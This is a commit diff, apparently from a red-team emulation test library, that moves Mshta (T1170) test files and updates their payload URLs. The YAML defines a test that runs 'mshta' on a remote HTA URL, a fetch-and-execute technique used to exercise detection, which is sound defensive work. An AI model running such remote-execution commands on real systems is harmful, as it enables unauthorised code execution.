moving recently added source files to /src per project spec (#783)
* updates paths to files * moving T1170.hta to the source directory * moving mshta.sct to the /src directory Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
@@ -12,7 +12,7 @@ atomic_tests:
|
||||
file_url:
|
||||
description: location of the payload
|
||||
type: Url
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/mshta.sct
|
||||
executor:
|
||||
name: command_prompt
|
||||
elevation_required: false
|
||||
@@ -58,8 +58,8 @@ atomic_tests:
|
||||
hta_url:
|
||||
description: URL to HTA file for execution
|
||||
type: string
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/T1170.hta
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: |
|
||||
mshta #{hta_url}
|
||||
mshta #{hta_url}
|
||||
|
||||
@@ -9,4 +9,4 @@
|
||||
<body>
|
||||
<script>self.close();</script>
|
||||
</body>
|
||||
</html>
|
||||
</html>
|
||||
Reference in New Issue
Block a user